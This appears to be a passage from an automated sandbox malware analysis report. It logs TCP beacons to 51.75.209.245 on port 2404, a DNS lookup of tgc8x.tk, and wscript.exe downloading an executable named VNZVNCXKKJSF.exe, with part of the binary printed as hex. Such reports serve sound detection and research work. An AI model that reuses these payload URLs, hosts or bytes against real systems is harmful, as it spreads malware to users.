Nov 3, 2022 23:36:38.741400957 CET	49712	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:36:44.757457972 CET	49712	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:36:57.868833065 CET	49713	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:00.883827925 CET	49713	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:06.884363890 CET	49713	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:19.902163982 CET	49714	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:22.960484028 CET	49714	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:29.061022043 CET	49714	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:42.178406954 CET	49715	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:45.192643881 CET	49715	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:37:51.193121910 CET	49715	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:04.496992111 CET	49716	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:07.491359949 CET	49716	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:13.491866112 CET	49716	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:26.520153046 CET	49717	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:29.665158033 CET	49717	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:35.665662050 CET	49717	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:48.683542013 CET	49718	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:51.698323965 CET	49718	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:38:57.699038982 CET	49718	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:39:10.716201067 CET	49719	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:39:13.731376886 CET	49719	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:39:19.732033014 CET	49719	2404	192.168.2.6	51.75.209.245

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 23:35:55.641128063 CET	58595	53	192.168.2.6	8.8.8.8
Nov 3, 2022 23:35:55.675801992 CET	53	58595	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 23:35:55.641128063 CET	192.168.2.6	8.8.8.8	0x1f1f	Standard query (0)	tgc8x.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 23:35:55.675801992 CET	8.8.8.8	192.168.2.6	0x1f1f	No error (0)	tgc8x.tk		50.115.174.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tgc8x.tk

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49710	50.115.174.192	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 22:35:56 UTC	0	OUT	GET /tt/VNZVNCXKKJSF.exe HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: tgc8x.tk Connection: Keep-Alive
2022-11-03 22:35:56 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 03 Nov 2022 22:35:55 GMT Server: Apache Last-Modified: Thu, 03 Nov 2022 03:51:27 GMT Accept-Ranges: bytes Content-Length: 613184 Connection: close Content-Type: application/x-msdownload
2022-11-03 22:35:56 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 3a 63 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 22 09 00 00 3a 09 00 00 00 00 00 76 40 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:cc":v@ `@ `
2022-11-03 22:35:56 UTC	8	IN	Data Raw: 2a 00 00 03 30 09 00 06 00 00 00 00 00 00 00 2b 02 26 16 16 2a 00 00 03 30 09 00 0b 00 00 00 00 00 00 00 2b 02 26 16 00 28 60 00 00 0a 2a 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 02 03 28 61 00 00 0a 2a 00 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 34 00 00 06 25 26 2a 00 00 00 03 30 09 00 0e 00 00 00 00 00 00 00 2b 02 26 16 00 02 28 29 00 00 0a 25 26 2a 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 62 00 00 0a 25 26 2a 00 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 35 00 00 06 25 26 2a 00 00 00 03 30 09 00 10 00 00 00 00 00 00 00 2b 02 26 16 00 02 03 04 28 63 00 00 0a 25 26 2a 03 30 09 00 0e 00 00 00 00 00 00 00 2b 02 26 16 00 02 28 38 00 00 0a 25 26 2a 00 00 03 30 09 00 0b 00 00 00 00 00 00 00 Data Ascii: 0+&0+&(`0+&(a0+&(4%&0+&()%&0+&(b%&0+&(5%&0+&(c%&0+&(8%&0
2022-11-03 22:35:56 UTC	16	IN	Data Raw: f2 54 36 cc 69 8a 21 54 f0 a9 e8 e3 07 fc 07 c0 1c c8 35 91 0b 1d 46 f4 66 d6 ae f3 a8 0e 6a 95 20 97 a7 c5 df 03 ab 98 bc 80 ae 4f fe 78 7e 35 f2 7f 00 cd b4 f9 6a fe 4d 34 c2 0e 44 ec d8 b4 a0 49 74 af 84 8e 27 8c ba 9c 8d 6a 66 78 2b 34 57 be 60 31 07 b7 37 1a fe 57 a9 8d a9 6c b1 41 5a 49 43 54 64 62 af 86 9f 7e ed 5e d9 23 2b 65 2c 62 80 88 f5 46 ff 20 dc ca 7f fd 5f 2c f8 4b ed 42 0e 31 68 68 7e 6f fd b6 f4 56 14 f5 aa 92 1c 8f 5c 66 76 60 b7 b5 3d 1e 8b be 8f 7b e1 fb 3f 92 5f 94 ff 8b 42 c6 22 07 2b 2b f8 93 16 02 38 f1 45 2e ac 4e 98 66 b3 69 b4 04 17 35 5b 0a 3a 48 91 5b db c5 fd 4a c6 c4 cb 34 09 bd 37 2f 49 fa 8d 73 bb c5 ba 50 2e bf 58 ab f8 85 76 1a 52 c1 c4 e8 04 a8 e5 e4 b4 e8 6e e2 11 34 39 98 e7 73 d1 8e f4 be f7 67 1c bd 26 06 cb b1 f4 Data Ascii: T6i!T5Ffj Ox~5jM4DIt'jfx+4W`17WlAZICTdb~^#+e,bF _,KB1hh~oV\fv`={?_B"++8E.Nfi5[:H[J47/IsP.XvRn49sg&
2022-11-03 22:35:56 UTC	23	IN	Data Raw: c1 41 e5 9c e4 b2 17 02 63 95 df 49 d6 d7 f1 8b 55 0c bb ac cd e6 a4 a0 f4 e1 68 a9 8f 36 56 d0 4d 76 e4 be 9b 83 72 18 5e dc e6 72 40 10 d1 e1 31 ee 6f 4f 2e 44 e8 fc d1 8a 4e 00 3c 8e 9b d9 0e 20 68 bc 6b 42 e8 d5 35 a0 8c 2c c6 4c 0c a9 be 8a 51 78 c9 ba 15 9a ba 85 08 f6 50 96 56 9a 24 45 38 53 3e 72 92 c0 fe c1 e6 3c df 02 b9 d1 2c 87 14 17 51 47 bf fe 43 43 66 68 fa 30 49 3d 1d 45 5f 29 ad 85 08 8d 3e 21 12 41 c8 0c db d3 15 be ef 9c 43 ea a2 73 2b 1a b3 3e 82 87 e6 f4 88 4e 18 cb 6f c4 ac de 35 28 f8 08 95 d6 88 4a eb f3 81 71 55 0c af ff a9 21 34 00 fd 78 14 f7 bf 16 cf b4 8d a0 5a 77 52 9b a0 49 cb 06 ca f9 24 a0 13 93 14 25 2e 4e dc 43 50 36 3b 18 5e c6 c9 6c 67 9d b5 6d be 57 1b 1a e1 71 38 8b 8e 0b d5 80 99 28 1c f3 6e b2 5e e3 98 67 67 13 b4 Data Ascii: AcIUh6VMvr^r@1oO.DN< hkB5,LQxPV$E8S>r<,QGCCfh0I=E_)>!ACs+>No5(JqU!4xZwRI$%.NCP6;^lgmWq8(n^gg
2022-11-03 22:35:56 UTC	31	IN	Data Raw: 02 ba d3 11 dd 24 14 78 1e 56 89 7e 3f 78 11 8e 40 43 db da 84 ef 93 ed 2f ba 3c 86 20 be d3 b8 38 87 74 77 77 54 34 8b 36 41 0c fc 51 2e 19 69 d0 c7 48 a6 bc 74 b2 41 7e 2c eb 43 36 b2 24 e8 71 47 c6 c5 a8 8f fa 90 a5 b6 66 71 69 98 05 7b 65 61 02 c1 4d ec e3 07 83 4b f4 40 f3 c6 76 82 9c fa 01 4a e5 ac 2e a4 07 d1 8f 3c 5f 56 c2 72 27 a4 38 c3 c5 70 e7 b6 b8 16 da f2 7d 7a bc e6 16 2a e0 b5 51 64 38 65 50 72 94 f0 a9 49 a3 98 19 ce fe d0 65 31 24 21 8c 6a 76 71 af da 67 43 a5 a4 40 57 d3 a2 9d b0 27 84 dc 12 d6 a9 6f 50 ed b0 81 19 ca 2e 75 9c 28 a0 47 03 64 f9 86 42 fa 24 18 c0 95 29 ce 20 4e 0a 34 b7 92 db 71 fb 4a 49 43 ea 2e 2c c9 e6 f4 9d a5 bb b3 c4 28 9f 69 53 de 99 ad 7e 3e 42 dc 4b 84 01 05 82 a0 e3 6c 94 e9 c8 dc 5d b2 97 55 16 ca d5 a2 08 f2 Data Ascii: $xV~?x@C/< 8twwT46AQ.iHtA~,C6$qGfqi{eaMK@vJ.<_Vr'8p}z*Qd8ePrIe1$!jvqgC@W'oP.u(GdB$) N4qJIC.,(iS~>BKl]U
2022-11-03 22:35:56 UTC	39	IN	Data Raw: 45 e8 29 4e c1 14 d5 5e c0 e5 84 db 49 ed 24 1e f4 08 d3 9f 62 dc 5b dc 5a ae b0 a8 0a 59 8f 0c ed 5d d6 9d 46 7c a0 8d 7c a6 44 d5 24 73 6e 24 f7 ac a2 db 0b a0 37 33 2f 5b 19 5e 6f 70 e7 3f 2a b8 98 84 bc 27 5b 1f 61 d7 4c e9 f9 d3 35 0f 3f 0b 70 44 70 50 30 db 19 b9 22 60 40 7c cc da 3a 78 2b d4 5b 65 a6 9b 5c b6 e9 2b a0 d9 32 d4 e4 76 ac bb 1e 45 31 ac fa ca bd 69 01 26 12 7f 0d 3d 17 d1 71 98 48 38 69 37 80 0e ff 13 c3 25 cc 96 20 79 30 8f 3a 8c ac 04 1e d4 7b 1d ac b3 2a d1 08 0c c9 c2 f9 a9 db 3a 7e df 0e 80 de 0d 13 12 13 9b 1c 42 7c 3f 00 8f a5 40 63 46 57 7a 37 db e0 4a ae bf 6b a7 f3 c0 3c f8 7a 91 24 5e a5 f7 a3 bf c8 69 ad b8 1b 0b 3c 97 0b ba 4f bc b9 0d 86 09 58 1d b1 85 61 bd 91 cf 14 18 1b 11 63 24 d1 91 ef 27 9e 3a e0 d7 19 24 5f 87 23 Data Ascii: E)N^I$b[ZY]F\|\|D$sn$73/[^op?'[aL5?pDpP0"`@\|:x+[e\+2vE1i&=qH8i7% y0:{:~B\|?@cFWz7Jk<z$^i<OXac$':$_#
2022-11-03 22:35:56 UTC	47	IN	Data Raw: 82 5b bd 4d f6 af fa 81 c9 8c 35 42 2e 1f e0 e6 14 59 23 07 34 2f a0 87 84 4e 33 23 0a 1f cb 9f a7 a1 35 65 82 99 dc 6c 52 2c 29 41 fb 11 f3 fe 59 77 7d b1 00 ff 5b 3a b6 05 80 3e e7 64 aa fb e8 08 52 75 d3 cd dc 53 c8 ef 0f 76 5a 37 33 89 1e 58 da c0 0f 38 b4 2f bc f7 3c 35 34 09 c9 d5 5f 33 ce a5 f5 7d 55 6d 68 51 0d 34 68 a5 4e a0 9c 1d c0 f6 62 df 07 be 56 0c e0 44 a7 d0 67 d7 09 35 69 53 5c 68 c6 6c 56 0e 1b 19 e6 1e fb 4c d5 81 0b 0d 84 34 d5 50 08 eb c5 ad 56 dd 69 19 a7 18 cd 18 cd f7 18 33 0e 9a ef d4 9d db 3b 42 7a fe a1 c6 a7 43 ef 41 8e ef 13 c2 58 e7 11 5b 58 94 50 55 b5 91 0e ea fe 40 e9 3c 55 98 0d 4c d5 b4 80 19 b0 8c 05 01 a3 b2 88 69 ad f2 cc 7a 25 5c f5 b4 b7 c0 f7 c1 5c ff f1 0a 94 7e 57 84 50 08 0c 6e 33 d9 21 87 8b e8 50 cc 00 c9 8f Data Ascii: [M5B.Y#4/N3#5elR,)AYw}[:>dRuSvZ73X8/<54_3}UmhQ4hNbVDg5iS\hlVL4PVi3;BzCAX[XPU@<ULiz%\\~WPn3!P
2022-11-03 22:35:57 UTC	55	IN	Data Raw: 55 87 0e 25 29 0d 7c 8b ec ff e6 8c 8a 83 db 08 a1 6d b1 26 82 2b d5 45 6b 84 4a fb 54 52 0d df d8 4a 60 d5 79 fe 9b 57 47 bf 43 96 ff a3 b1 57 c3 3d 95 45 25 31 65 f0 c0 ba e4 57 ab 13 52 da 8d c6 10 60 a6 f2 ec d9 24 89 5c 2c 25 fd ed 32 9c a6 e2 2d b4 ef c3 86 4a 39 90 c8 d5 b4 fd 73 71 7f ca 92 6c 50 26 88 3a 14 88 89 fa d3 ce d0 04 58 27 6c 59 94 81 d6 c0 c9 54 52 89 9c 26 f1 14 07 53 c0 46 fe 86 64 19 27 6d fa 6c 2a d0 e9 ef 6e 55 da 6d 9b 66 f6 37 91 d9 5f eb ef a5 f1 c5 33 a0 72 1d 95 6c 3a 6b 2a a8 68 77 16 6e eb 63 bd 3b fc 31 78 fd 61 95 3a d2 f2 3a 1e b0 4b 9e 13 de d6 ca 8a 02 11 6a 26 88 1c 90 e6 87 6e 7e 15 34 3a 4f bd 7e f0 f2 cc cb 59 3c 2c e2 05 c8 32 27 b0 b5 a7 5f 57 ba 2e f1 07 62 3b 91 5d 58 0f bc ea 38 a0 9a ed 90 42 97 f9 08 f9 e2 Data Ascii: U%)\|m&+EkJTRJ`yWGCW=E%1eWR`$\,%2-J9sqlP&:X'lYTR&SFd'mlnUmf7_3rl:khwnc;1xa::Kj&n~4:O~Y<,2'_W.b;]X8B
2022-11-03 22:35:57 UTC	63	IN	Data Raw: d7 5e 4b 1d 26 5e 21 0d d2 74 86 98 25 2d 78 71 c3 7a c3 5d 6e 4f a5 3e d6 96 24 97 47 ed b8 76 52 ad 53 14 e8 2a 08 ab 23 76 41 dc e0 5c 0a f6 e1 36 3a cd 66 26 8b 0b ef c1 6f 3a db 07 0a c0 56 4f 2e 4e 6b cd cb 95 7d 01 15 18 09 2e ce 7d 0e bc 29 61 14 71 d2 b2 3f 4d 76 be 95 09 73 4d 98 09 5b 3b 3d 1e 8b 8c 4a 83 97 0e 21 b7 a7 12 f6 99 11 ef 04 22 99 e0 2a a9 11 ac 76 23 45 ab 7e fc 7d 1e 12 26 c8 cd 2b aa 3a 01 40 ad 0b 4f 2b ff 7a 7b 3d 9c e0 3d b7 2a 8a 1d 89 c4 d4 08 8c 99 0c 5b 0c d3 2c 6c 4b ce 63 a5 4c 83 92 8a cc 19 cc 6d 81 b8 0d 07 c1 d2 e2 9e 05 c3 b0 e9 e0 c8 d6 5b cc 39 af 8f 46 11 05 f1 78 97 1d 7b fd 39 ac e9 85 a7 2a 97 1e 36 bb 28 7d 83 44 35 79 c1 0b f8 1e b7 fa c7 7f 04 9a c6 87 19 6e ab 8e 8f dd 0e eb 65 6e 06 64 0c 0a c4 df 4c f9 Data Ascii: ^K&^!t%-xqz]nO>$GvRS#vA\6:f&o:VO.Nk}.})aq?MvsM[;=J!"v#E~}&+:@O+z{==[,lKcLm[9Fx{96(}D5ynendL
2022-11-03 22:35:57 UTC	70	IN	Data Raw: 43 4d 8a 00 55 4d d2 95 db d7 f3 d3 1b bc 89 a4 70 c7 39 17 c9 b1 51 0c 87 00 e2 35 e8 86 05 10 b1 e9 75 e5 9d f5 aa 91 02 9a 15 7c 93 ed 9d 25 da c4 4a fd c9 5b 60 a0 9d e5 9a 99 71 7e 3f fc 11 08 3e 17 86 4a 29 df 61 a2 83 74 5c b5 f8 87 68 07 d2 b5 39 14 4d 40 40 ff 19 e7 d9 1e d4 ba f8 34 e0 97 f2 4b b6 7d 59 ca 5c e1 0a 99 c6 9a 31 c6 8b 13 cd eb 94 f8 65 9b 0a 7d 75 47 e8 fe 73 1c b2 87 42 2c c8 78 ba 67 c4 b7 6e b7 ab 35 85 86 2c 76 5b 49 b1 8a b1 7e 9a 76 20 26 35 3f 99 4f f3 9c e7 ce ac 3c 4c 70 93 89 06 44 d1 dc 57 16 8c 6e dc 0d 24 c8 85 2e 96 42 c4 7b c5 e9 4c 2f b1 58 b2 e3 d9 5b 1c 71 a2 c7 0f 97 38 0b 98 ce 6f 56 1f 80 9c fa a3 2b ee 93 b7 d8 1a 28 5d fd 0e 32 de 96 21 ed bc 98 d8 fb 96 22 27 a5 c2 59 e2 f4 9a 3e 45 fb 33 5d a8 27 2f b8 2d Data Ascii: CMUMp9Q5u\|%J[`q~?>J)at\h9M@@4K}Y\1e}uGsB,xgn5,v[I~v &5?O<LpDWn$.B{L/X[q8oV+(]2!"'Y>E3]'/-
2022-11-03 22:35:57 UTC	78	IN	Data Raw: 53 10 d0 ee 5e 07 59 b5 b8 99 36 61 70 07 c4 42 c0 e8 65 52 1b 48 06 83 bf 4f 9e c6 1c ed ef 12 01 18 57 2f fd 77 d5 9b e9 74 8c d7 b7 c4 58 f8 9d e8 a2 fe fc ab f0 8d 55 f6 81 37 55 48 c1 43 aa 9d 90 94 cb a0 b8 ce 12 05 67 26 fc 73 6c 46 6d f0 fd 30 e2 e2 1e a7 27 bd 48 91 b3 fe 21 8a 28 28 74 bb 9d 85 d2 20 0c ef 5d ed be 7b ab 51 66 28 8e cd 24 4f 58 10 ac 92 41 c1 99 dd 62 8f 1d c3 d9 1f e8 09 7f 79 e3 24 43 8d 0b f6 08 60 ae 6d c4 93 49 0e 54 a9 6c 28 4c b3 21 da b9 d2 ea c3 a4 ee 1b 1c 66 90 4e 97 02 9d b4 17 43 92 ea 40 5c a6 9e 43 39 b4 7f cc 40 95 6e ba 23 1d 7c c6 22 73 df a7 d8 77 f1 4f b8 e4 8b 43 fa 4e 85 9b 8a 74 bc c2 d0 43 8f c6 55 9d c7 bf a3 29 66 d8 f6 a0 d8 13 cd d3 09 31 64 2c a9 03 e8 7d 63 ea f2 30 76 5e dd 27 60 2c c5 53 e6 de be Data Ascii: S^Y6apBeRHOW/wtXU7UHCg&slFm0'H!((t ]{Qf($OXAby$C`mITl(L!fNC@\C9@n#\|"swOCNtCU)f1d,}c0v^'`,S
2022-11-03 22:35:57 UTC	86	IN	Data Raw: f5 27 31 98 45 0e cd e3 00 39 d3 b8 e8 a8 28 c9 82 1f 4d d0 cd 54 2e 6a 17 5e 2e 11 0d 07 df 7b 10 4e 21 df d4 db 6c e6 32 6a f7 68 a0 7c d3 18 5a 96 a4 84 bb b2 4f 2c 05 a6 2a 7e 5c db 83 04 24 b2 8b 5b 79 ca 37 bb 2e 5b 33 3f 52 30 6a 8b 55 9b 10 51 fd eb ca 77 9b d8 b7 a5 6c a9 6d 1f 36 4e 94 56 b8 ad 53 25 78 f4 00 cf c8 76 32 50 ba f5 69 7f c0 d1 a8 44 f6 f8 24 dc 93 1d 34 5f e1 85 6b 65 f7 76 42 91 36 e2 24 82 0c af ff a6 f9 09 5e 75 1c 5f f1 eb 0f 88 a0 4e cd be 9f 0d 08 f8 64 77 36 e6 bf 78 a9 ef 4a 8b 64 d8 82 11 75 9d 45 f4 5c 15 a5 1f 9e 83 6d 2c d8 db 0f 73 a0 f6 2d fc 80 51 3f 71 c7 64 e6 45 03 02 7f be 9c df 87 aa 23 e2 3c 83 80 9b d2 7c 63 aa 85 22 ee 58 c7 5f 19 ea aa 5a 3d fa 0c e3 12 32 7a 73 f9 4c b9 34 a7 19 47 57 43 98 1c 0f db 05 65 Data Ascii: '1E9(MT.j^.{N!l2jh\|ZO,*~\$[y7.[3?R0jUQwlm6NVS%xv2PiD$4_kevB6$^u_Ndw6xJduE\m,s-Q?qdE#<\|c"X_Z=2zsL4GWCe
2022-11-03 22:35:57 UTC	94	IN	Data Raw: 45 1f 01 2b e7 d3 8b c6 8d 2a ac 14 70 44 e8 2b a2 11 4e f2 91 e7 58 26 b4 93 73 e8 1e 94 14 e5 2e a7 55 46 48 66 f7 be 5c d1 e4 59 f0 f2 20 91 1f 56 95 42 98 ab 2d 9c 7f 5c 7e 25 60 6a 29 0a 2c a6 eb 20 6c 09 58 be e5 64 71 04 32 88 cf 05 ca 72 aa 13 7c 5a 6e 82 b0 c0 fc 41 b9 8d 62 7b f0 6e 5b 96 d9 a4 b4 05 78 fa d6 bc 69 05 ed 33 02 7c 40 e1 11 0b be a0 c9 cc de fa 80 52 f2 a4 eb 36 91 19 e8 16 18 3b 0f 0b ae 75 6e 93 27 11 f9 0b 6a 15 84 78 d4 98 57 4b 54 57 16 5a b9 51 7f 9d 53 56 9d f2 84 ce 4c 7e 93 88 84 88 5e 65 f6 9c 6c 68 71 bc 6b c0 20 c5 57 8a e9 c8 0f 64 fd dd 88 d1 1d 77 03 86 a5 41 a6 74 12 57 d6 39 db c9 56 30 1b 3b d6 45 97 1e 5a eb 12 34 2f 23 b2 6e 45 ab 2e 98 c1 12 43 fb 95 72 51 34 f9 37 4d 09 fa 60 4c 20 32 d3 47 41 11 a5 e6 dd cf Data Ascii: E+*pD+NX&s.UFHf\Y VB-\~%`j), lXdq2r\|ZnAb{n[xi3\|@R6;un'jxWKTWZQSVL~^elhqk WdwAtW9V0;EZ4/#nE.CrQ47M`L 2GA
2022-11-03 22:35:57 UTC	102	IN	Data Raw: 7a 43 a4 de 0d 17 bb ce 03 d4 29 cd 2f 15 10 d8 73 27 a7 dd 54 6d 2a 5e 3a e4 a2 18 5b 94 11 01 a0 21 01 99 39 09 86 ba 20 54 41 b9 ae 51 97 69 b1 d5 4b a5 c5 20 b8 6c 46 54 0c 69 cb 70 5e ea a5 08 e6 62 92 fc fd 14 33 ac 90 fb 7a bd 24 26 9f 60 95 bf b9 ab 7b 4c 41 23 7d 0a c6 1a c7 5a 8d 05 01 bd b1 24 95 0a 4f 48 d1 c3 38 6a 60 18 73 27 a7 dd 54 6d 2a 5e 54 24 89 41 32 79 c4 a8 e3 2e 05 e5 ca 75 0b b9 31 0b f6 6d c4 d7 68 dc 9f bf d5 4f 4c 8c ae 8e ed fb 50 6c 6e 96 f1 0c 2c 2c 07 23 dd 6c 83 5d ae e2 8e 05 4c de 6e 52 a3 4d 09 f2 52 c7 ae 1e b7 42 16 ca ef 23 b7 4e 06 5c 92 e6 40 b4 bd 08 76 9e cd cf fd 67 70 9b 52 12 15 14 81 7c 1b 3d 91 b7 7b 17 47 0a 8f fd af ca 3a be 83 b8 86 dc 73 63 48 2d 53 dd d1 6e 0e 1c 09 2d 1c 2d d5 7d 41 1f 05 75 bd be 59 Data Ascii: zC)/s'Tm^:[!9 TAQiK lFTip^b3z$&`{LA#}Z$OH8j`s'Tm^T$A2y.u1mhOLPln,,#l]LnRMRB#N\@vgpR\|={G:scH-Sn--}AuY
2022-11-03 22:35:57 UTC	109	IN	Data Raw: f9 7e e0 56 4b 91 a6 ec 96 4f db 69 bd fc 97 7b ef 3b e7 a6 44 c4 31 9e c7 86 1e 1c 09 78 9f da b4 ae ee dd 36 35 a4 da fc db dc 08 3b 92 7f 37 f4 76 65 cc ff 9d 2e 48 4f a0 6a f4 68 68 c2 9f 94 6b 70 4b 5d 69 cf 57 47 df 46 06 ad 91 97 8e 95 ce f7 93 23 5d 2f 10 8a 0a 5a 73 5e b2 c8 92 c1 c9 ed af 49 58 95 1a 42 ab 64 96 39 3d 04 08 09 a5 d4 22 fd 0c dd 9c e8 fe 06 e9 76 1c f9 d6 a4 34 9f 82 54 4a 6d b1 ba d4 f8 d3 24 be 0b 85 68 c3 9a fb c5 c2 21 ca 78 b9 83 ca 43 aa f5 08 48 88 df 1f b3 6e 35 d6 b0 95 14 00 19 02 04 95 f5 31 e1 44 f0 72 f6 47 e5 5d d9 19 c8 49 06 53 8e e6 37 7f a3 23 cb b7 72 36 2e 03 a5 4e 2e 8b d6 b3 c8 6c 98 30 51 a7 68 b4 f4 bb e9 f4 3b fe bd 22 e6 7b 52 fe 3d dd 9c 72 7c ba b6 b9 49 97 88 0d 62 90 db 0f 99 08 55 fd f1 35 ac a3 a1 Data Ascii: ~VKOi{;D1x65;7ve.HOjhhkpK]iWGF#]/Zs^IXBd9="v4TJm$h!xCHn51DrG]IS7#r6.N.l0Qh;"{R=r\|IbU5
2022-11-03 22:35:57 UTC	117	IN	Data Raw: 04 bd f6 de ce 02 64 c8 04 52 21 c6 91 14 15 0c 85 66 6e 4a 58 4a b6 e3 cc e0 14 4b 2e f6 44 3d bf 8f 9c 86 4c e3 83 4a 95 74 e4 4e 36 3f 92 b5 e7 00 c6 45 14 0b 9f c8 8f 39 ef a1 d4 c3 e2 77 93 59 27 89 64 20 69 9c 2f 7e 83 03 54 e5 f1 d3 75 18 55 71 4c dd d1 50 29 ad 3c b9 63 ed 65 f2 1a 60 44 8c a0 0e 6e 81 0d 58 fb 30 2b 2b f3 00 66 c5 a4 33 10 90 bb 8c 53 77 9e e3 da 7c d3 7d 26 cb bf c9 a0 51 6c f9 90 e4 63 8c d5 4a c2 47 9e 94 f8 ac ca 41 30 d3 6c b5 d6 db 56 c9 c2 f8 6b 5d 59 85 dd aa 07 50 1f 49 64 87 db 46 42 a5 1b 6d bf 28 e1 54 24 52 a3 1f e1 95 84 28 63 0d fc 7d 18 cb 0a b5 97 73 8f 59 b2 2d c0 e8 77 cc 2c f7 0e 05 1c 42 22 c2 75 f6 5b c5 2e d1 46 48 26 01 86 31 da 33 13 9a 11 cd df 96 04 c3 a5 4c e8 46 0c 79 b7 53 75 42 d3 5d af 13 76 21 5d Data Ascii: dR!fnJXJK.D=LJtN6?E9wY'd i/~TuUqLP)<ce`DnX0++f3Sw\|}&QlcJGA0lVk]YPIdFBm(T$R(c}sY-w,B"u[.FH&13LFySuB]v!]
2022-11-03 22:35:57 UTC	125	IN	Data Raw: e0 70 b0 7c d5 2a 1a b7 6b 56 14 aa bf fa 29 a7 fd f5 4b 78 69 64 53 35 aa 27 44 ce 69 dd 9b c4 3a 4d 09 eb f6 49 ad 33 cb a1 0a 9c 7c 18 20 64 45 dc 4e 27 6e a0 4b e2 b7 eb e1 f7 08 dc 04 be 0b 16 55 30 13 45 1c 7b f9 15 77 78 ec c8 fb fe bb b2 4a c9 03 02 ce cb 0f 10 90 25 c2 7d 5b ee 5b 8f 31 db 01 44 2a 12 3e d1 14 53 b3 35 12 69 4f a3 39 88 53 77 ff 5c 18 00 06 e4 06 00 62 2c 10 64 57 47 a7 66 22 a4 bd b7 48 50 02 12 81 1d 2e 04 7c 5f 79 8c 85 34 3d ad 26 fe 6e 94 67 12 26 4e 5c 58 87 0c 59 a6 a9 75 86 73 9a 4b ab b2 92 08 d3 34 e1 a9 c0 1e 5a c7 48 d5 c2 f6 08 8b 80 2f 0f f4 f2 7f c3 25 30 9a b6 a8 0d f4 f0 dd a4 52 84 73 fd 4f c1 85 5b 83 21 5b 8d 99 d2 79 05 e0 dc 9f 66 12 25 a5 59 76 28 dd 71 f7 8d de 35 b7 c7 93 6f e4 86 93 37 91 fa b8 25 b7 0e Data Ascii: p\|kV)KxidS5'Di:MI3\| dEN'nKU0E{wxJ%}[[1D>S5iO9Sw\b,dWGf"HP.\|_y4=&ng&N\XYusK4ZH/%0RsO[![yf%Yv(q5o7%
2022-11-03 22:35:57 UTC	133	IN	Data Raw: c6 6c 2b 02 55 c8 8b fe f4 8b ae 7d 51 bd af 7c 29 b7 eb 78 0d 36 9b d5 7a 88 b9 8c ac 7d a8 b1 31 62 fd 53 ea 82 61 3c 1e eb 99 79 1d 22 7e b1 98 fb fd 80 d5 c1 6f c0 5c a6 94 6b 8e f6 ff ee 2e ed 2a 00 b4 b9 27 27 e4 97 ad 97 48 25 cb f8 89 54 ae 53 07 47 3b 01 b4 1d 3d 97 2b 95 2d 58 fb 6d 25 e6 60 ed 16 cf 4d 2b b9 5d ac 87 d2 1e a0 d2 dd c2 62 18 7d e8 11 aa 4f 2f 70 2e b3 d2 05 ef 08 f4 11 81 bc 46 0d 3c ec 5f 20 d9 bb 12 39 77 8d a6 f5 2e 86 83 39 77 0d 83 3d 79 33 4c 30 bb 8d e5 64 84 66 6e ce bc f2 2a 0e 0e 55 ec d6 47 c9 75 cb 5c aa 1a cc 3e 55 48 ec b0 6f f8 14 4c 